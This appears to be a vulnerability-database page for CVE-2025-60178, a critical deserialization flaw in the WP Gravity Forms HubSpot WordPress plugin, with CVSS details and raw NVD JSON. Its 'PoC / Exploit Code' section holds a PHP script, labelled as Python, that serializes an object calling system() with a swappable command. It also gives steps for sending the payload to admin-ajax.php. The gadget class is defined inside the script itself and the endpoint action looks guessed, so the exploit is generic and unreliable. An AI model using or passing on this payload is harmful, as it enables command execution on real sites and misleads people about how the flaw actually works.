Security Vulnerability Report
中文
CVE-2025-60178 CVSS 9.8 CRITICAL

CVE-2025-60178

Published: 2025-12-18 08:16:10
Last Modified: 2026-01-20 15:17:29

Description

Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms HubSpot gf-hubspot allows Object Injection.This issue affects WP Gravity Forms HubSpot: from n/a through <= 1.2.6.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crmperks:wp_gravity_forms_hubspot:*:*:*:*:*:wordpress:*:* - VULNERABLE
WP Gravity Forms HubSpot (gf-hubspot) <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-60178 PoC - WP Gravity Forms HubSpot Object Injection // This PoC demonstrates the deserialization vulnerability in gf-hubspot plugin class GadgetChain { public $callback; public $args; public function __destruct() { if (isset($this->callback)) { call_user_func_array($this->callback, $this->args); } } } // Generate malicious serialized payload $payload = new GadgetChain(); $payload->callback = 'system'; $payload->args = ['id']; // Change command as needed $serialized_payload = serialize($payload); echo "Malicious Payload:\n"; echo $serialized_payload . "\n\n"; echo "URL Encoded:\n"; echo urlencode($serialized_payload) . "\n"; /* Usage: 1. Identify a gf-hubspot endpoint that accepts serialized data 2. Send the malicious payload via POST parameter 3. Example: POST /wp-admin/admin-ajax.php action=gf_hubspot_process&data=[MALICIOUS_PAYLOAD] Note: This is for educational and security testing purposes only. */ ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60178", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:09.603", "lastModified": "2026-01-20T15:17:28.853", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms HubSpot gf-hubspot allows Object Injection.This issue affects WP Gravity Forms HubSpot: from n/a through <= 1.2.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmperks:wp_gravity_forms_hubspot:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.2.7", "matchCriteriaId": "19EF1C95-8CED-49D0-B89F-026C7254DE98"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-hubspot/vulnerability/wordpress-wp-gravity-forms-hubspot-plugin-1-2-6-deserialization-of-untrusted-data-vulnerability?_s_id=cve", "source": "[email protected]"}]}}